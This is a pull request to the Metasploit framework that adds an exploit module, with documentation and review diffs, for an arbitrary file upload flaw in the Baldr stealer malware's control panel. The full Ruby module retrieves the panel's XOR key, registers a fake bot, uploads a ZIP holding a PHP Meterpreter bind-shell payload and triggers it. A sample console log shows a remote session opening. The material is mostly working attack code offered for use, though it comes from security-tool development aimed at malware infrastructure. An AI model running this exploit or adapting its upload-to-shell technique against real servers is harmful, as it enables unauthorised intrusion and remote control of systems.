### PR TITLE
Add Baldr Botnet Panel RCE Module

### DIFF
--- a/documentation/modules/exploit/multi/http/baldr_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/baldr_upload_exec.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a arbitrary file upload vulnerability within the Baldr stealer malware control panel. Attackers can turn this
+vulnerability into an RCE by adding a malicious PHP code inside the victim logs ZIP file and registering a new bot to the panel by uploading the ZIP file under logs directory. On versions 3.0 and 3.1 victim logs are ciphered by a random 4 byte XOR key. 
+This exploit module retrieves the IP spesific XOR key from panel gate and registers a new victim to the panel with adding the selected payload inside the victim logs. 
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/baldr_upload_exec`
+  4. Do `set rhost 192.168.1.27`
+  4. Do: `check`
+```
+[*] Verison: Baldr <= v2.0
+[+] 192.168.1.27:80 - The target is vulnerable.
+```
+
+## Targets
+
+```
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Auto
+   1   <= v2.0
+   2   v2.2
+   3   v3.0 & v3.1
+```
+
+
+## Scenarios
+```
+msf5 > use exploit/multi/http/baldr_upload_exec 
+msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27
+rhost => 192.168.1.27
+msf5 exploit(multi/http/baldr_upload_exec) > run
+
+[*] Baldr Verison: <= v2.0
+[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
+[+] Payload successfully triggered !
+[*] Started bind TCP handler against 192.168.1.27:9090
+[*] Sending stage (38288 bytes) to 192.168.1.27
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
+
+meterpreter > 
+```

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -144,11 +144,8 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
         'data'  => data.to_s
       })
 
-      if res && res.code == 200
-        print_good("Bot successfully registered.")
-      else
-        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
-      end
+      fail_with(Failure::UnexpectedReply, "Could not obtain gate key") unless res && res.code == 200
+      print_good("Bot successfully registered.")
 
       data = xor(zip.to_s,key)
       form = Rex::MIME::Message.new

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -171,7 +171,8 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
         'uri' => normalize_uri(target_uri.path,"gate.php")
       })
 
-      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+      fail_with(Failure::NotFound, "Failed to obtain response") unless res
+      unless res.code != 200 || res.body.to_s.include?('~;~')
         fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
       end
 

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -8,6 +8,7 @@ require 'net/http'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info={})
     super(update_info(info,
@@ -80,7 +81,7 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
 
   def check
     if select_target
-      Exploit::CheckCode::Appears("Baldr Verison: #{select_target.name}")
+      Exploit::CheckCode::Appears("Baldr Version: #{select_target.name}")
     else
       Exploit::CheckCode::Safe
     end
@@ -105,8 +106,6 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
   end
 
   def exploit
-    # Start by checking the gate version
-    check
     # Forge the payload
     name = ".#{Rex::Text.rand_text_alpha(4)}"
     files =
@@ -123,20 +122,22 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
       version = target
     end
 
-    case version
-    when targets[3]
-      res = send_request_cgi({
+
+    gate_res = send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path,"gate.php")
-      })
-      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+     })
+
+    case version
+    when targets[3]
+      unless gate_res || gate_res.code != 200 || gate_res.body.to_s.include?('~;~')
           fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
       end
-      key = res.body.to_s.split('~;~')[0]
+      key = gate_res.body.to_s.split('~;~')[0]
       print_good("Key: #{key}")
 
       data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
-      data = xor(data,key)
+      data = Rex::Text.xor(data,key)
 
       res = send_request_cgi({
         'method' => 'GET',
@@ -147,7 +148,7 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
       fail_with(Failure::UnexpectedReply, "Could not obtain gate key") unless res && res.code == 200
       print_good("Bot successfully registered.")
 
-      data = xor(zip.to_s,key)
+      data = Rex::Text.xor(zip.to_s,key)
       form = Rex::MIME::Message.new
       form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"#{hwid}.zip\"")
 
@@ -166,21 +167,17 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
       end
 
     when targets[2]
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path,"gate.php")
-      })
 
-      fail_with(Failure::NotFound, "Failed to obtain response") unless res
-      unless res.code != 200 || res.body.to_s.include?('~;~')
+      fail_with(Failure::NotFound, "Failed to obtain response") unless gate_res
+      unless gate_res.code != 200 || gate_res.body.to_s.include?('~;~')
         fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
       end
 
-      key = res.body.to_s.split(';')[0]
+      key = gate_res.body.to_s.split(';')[0]
       print_good("Key: #{key}")
       data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
       data << zip.to_s
-      result = xor(data,key)
+      result = Rex::Text.xor(data,key)
 
       res = send_request_cgi({
         'method'    => 'POST',
@@ -221,20 +218,10 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
       end
     end
 
-
     send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path,'logs',hwid,"#{name}.php")
     },3)
     print_good("Payload successfully triggered !")
-  end
-
-  def xor(data, key)
-    result = ""
-    codepoints = data.each_codepoint.to_a
-    codepoints.each_index do |i|
-        result += (codepoints[i] ^ key[i % key.size].ord).chr
-    end
-    result
   end
 end

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -108,7 +108,7 @@ This exploit module retrieves the IP spesific XOR key from panel gate and regist
     # Start by checking the gate version
     check
     # Forge the payload
-    name = '.'+Rex::Text.rand_text_alpha(4)
+    name = ".#{Rex::Text.rand_text_alpha(4)}"
     files =
     [
       {data: payload.encoded, fname: "#{name}.php"}

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -1,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
+      'Description'    => %q{
+        This module exploits a arbitrary file upload vulnerability within the Baldr stealer malware control panel. Attackers can turn this
+vulnerability into an RCE by adding a malicious PHP code inside the victim logs ZIP file and registering a new bot to the panel by uploading the ZIP file under logs directory. On versions 3.0 and 3.1 victim logs are ciphered by a random 4 byte XOR key.
+This exploit module retrieves the IP spesific XOR key from panel gate and registers a new victim to the panel with adding the selected payload inside the victim logs.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <egebalci@pm.me>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/'],
+          ['URL', 'https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/'],
+          ['URL', 'https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf'],
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP],
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['<= v2.0',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['v2.2',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['v3.0 & v3.1',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
+      ]
+    )
+  end
+
+  def check
+    if select_target
+      Exploit::CheckCode::Appears("Baldr Verison: #{select_target.name}")
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def select_target
+    res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php")
+    )
+    if res && res.code == 200
+      if res.body.include?('~;~')
+        targets[3]
+      elsif res.body.include?(';')
+        targets[2]
+      elsif res.body.size < 4
+        targets[1]
+      else
+        nil
+      end
+    end
+  end
+
+  def exploit
+    # Start by checking the gate version
+    check
+    # Forge the payload
+    name = '.'+Rex::Text.rand_text_alpha(4)
+    files =
+    [
+      {data: payload.encoded, fname: "#{name}.php"}
+    ]
+    zip = Msf::Util::EXE.to_zip(files)
+    hwid = Rex::Text.rand_text_alpha(8).upcase
+
+
+    version = select_target
+    # If not 'Auto' then use the selected version
+    if target != targets[0]
+      version = target
+    end
+
+    case version
+    when targets[3]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php")
+      })
+      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+          fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
+      key = res.body.to_s.split('~;~')[0]
+      print_good("Key: #{key}")
+
+      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
+      data = xor(data,key)
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php"),
+        'data'  => data.to_s
+      })
+
+      if res && res.code == 200
+        print_good("Bot successfully registered.")
+      else
+        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
+
+      data = xor(zip.to_s,key)
+      form = Rex::MIME::Message.new
+      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"#{hwid}.zip\"")
+
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"gate.php"),
+        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
+        'data'      => form.to_s
+      })
+
+      if res && res.code == 200
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}")
+        fail_with(Failure::UnexpectedReply, "Failed to upload payload")
+      end
+
+    when targets[2]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php")
+      })
+
+      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
+
+      key = res.body.to_s.split(';')[0]
+      print_good("Key: #{key}")
+      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
+      data << zip.to_s
+      result = xor(data,key)
+
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"gate.php"),
+        'data'      => result.to_s
+      })
+
+      if res && res.code == 200
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}")
+        fail_with(Failure::UnexpectedReply, "Failed to upload payload")
+      end
+    else
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"gate.php"),
+        'data'      => zip.to_s,
+        'encode_params' => true,
+        'vars_get'  => {
+          'hwid'  => hwid,
+          'os'  => 'Windows 7 x64',
+          'cookie'  => '0',
+          'pswd'  => '0',
+          'credit'  => '0',
+          'wallet'  => '0',
+          'file'  => '1',
+          'autofill'  => '0',
+          'version'  => 'v2.0'
+        }
+      })
+
+      if res && res.code == 200
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}")
+        fail_with(Failure::UnexpectedReply, "Failed to upload payload")
+      end
+    end
+
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,'logs',hwid,"#{name}.php")
+    },3)
+    print_good("Payload successfully triggered !")
+  end
+
+  def xor(data, key)
+    result = ""
+    codepoints = data.each_codepoint.to_a
+    codepoints.each_index do |i|
+        result += (codepoints[i] ^ key[i % key.size].ord).chr
+    end
+    result
+  end
+end


### PR DESCRIPTION
Salutations :hand:,

This module exploits a arbitrary file upload vulnerability within the Baldr stealer malware control panel. Attackers can turn this vulnerability into an RCE by adding a malicious PHP code inside the victim logs ZIP file and registering a new bot to the panel by uploading the ZIP file under logs directory.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/baldr_upload_exec`
- [ ] Set `RHOST`
- [ ] Set `TARGETURI`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Baldr Verison: ...`
- [ ] **Verify** that you are seeing `Payload uploaded to /logs/...`
- [ ] **Verify** that you are seeing `Payload successfully triggered !`

Since this is malware, I have sent the source code of the Baldr stealer panel versions `2`, `2.2`, `3.0`, `3.1` to `msfdev[at]metasploit.com` in order to avoid publicly distributing here. Versions `2` and `2.2` requires  basic mysql installations before using the panel. On versions `3.0` and `3.1` just follow `install.php`

## References
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf
- https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/
- https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/